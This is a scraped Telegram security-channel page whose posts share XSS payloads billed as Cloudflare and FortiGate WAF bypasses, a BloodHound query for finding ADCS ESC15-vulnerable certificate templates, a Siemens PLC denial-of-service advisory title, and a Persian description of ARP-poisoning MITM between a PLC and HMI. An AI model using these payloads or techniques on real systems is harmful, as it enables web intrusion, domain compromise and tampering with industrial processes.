P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
CLOUDFLARE BYPASS xss

PAYLOAD:

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


FortiGate WAF bypass

<details open ontoggle="(()=>alertibrahimxss)()"></details>

#exploit #bypass
@pfkSecurity
BloodHound ADCS ESC15 (EKUwu) cypher query.

از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالب‌های گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده می‌کند.

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

@PfkSecurity
ssa-589181.pdf
34.9 KB
SSA-589181: Denial-Of-Service in SIMATIC S7-200 SMART CPU
Family Devices

@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.

@PfkSecurity